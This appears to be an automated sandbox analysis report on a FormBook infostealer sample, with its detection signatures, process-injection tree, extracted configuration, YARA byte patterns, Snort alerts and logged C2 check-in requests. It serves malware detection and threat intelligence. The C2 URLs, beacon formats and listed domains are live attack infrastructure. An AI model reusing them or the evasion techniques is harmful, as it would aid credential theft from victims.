Loading ...

Play interactive tourEdit tour

Windows Analysis Report pMbPS8nCm1.exe

Overview

General Information

Sample Name:pMbPS8nCm1.exe
Analysis ID:452687
MD5:de87f1794377537dda721afd9137e491
SHA1:3b0480a4afe176722d9b8cf6f9f9c9257b1d132f
SHA256:b0a684c7dfc5a94e3dd2edcb1c706eae088ff9d701ec55f0adb1ae977e5e9081
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • pMbPS8nCm1.exe (PID: 3492 cmdline: 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: DE87F1794377537DDA721AFD9137E491)
    • pMbPS8nCm1.exe (PID: 5800 cmdline: 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: DE87F1794377537DDA721AFD9137E491)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 4396 cmdline: /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.pMbPS8nCm1.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.pMbPS8nCm1.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.pMbPS8nCm1.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        2.1.pMbPS8nCm1.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.pMbPS8nCm1.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.aizaibali.com/Avira URL Cloud: Label: malware
          Source: http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxhAvira URL Cloud: Label: malware
          Source: http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGNAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: pMbPS8nCm1.exeVirustotal: Detection: 26%Perma Link
          Source: pMbPS8nCm1.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: pMbPS8nCm1.exeJoe Sandbox ML: detected
          Source: 13.2.raserver.exe.302d450.3.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.pMbPS8nCm1.exe.5a0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.pMbPS8nCm1.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.pMbPS8nCm1.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.raserver.exe.5167960.6.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: pMbPS8nCm1.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: pMbPS8nCm1.exe, 00000001.00000003.245067685.0000000002480000.00000004.00000001.sdmp, pMbPS8nCm1.exe, 00000002.00000002.306527493.0000000000A10000.00000040.00000001.sdmp, raserver.exe, 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pMbPS8nCm1.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1Host: www.cochez.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1Host: www.vermogenswerte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 95.215.210.10 95.215.210.10
          Source: Joe Sandbox ViewASN Name: NEWIT-ASRU NEWIT-ASRU
          Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1Host: www.cochez.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1Host: www.vermogenswerte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.cochez.club
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 16:05:24 GMTServer: Apache/2.4.6 (CentOS) PHP/7.3.19Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>
          Source: raserver.exe, 0000000D.00000002.513072851.00000000052E2000.00000004.00000001.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmpString found in binary or memory: http://www.aizaibali.com/
          Source: raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmpString found in binary or memory: http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: pMbPS8nCm1.exe, 00000001.00000002.248667021.000000000078A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
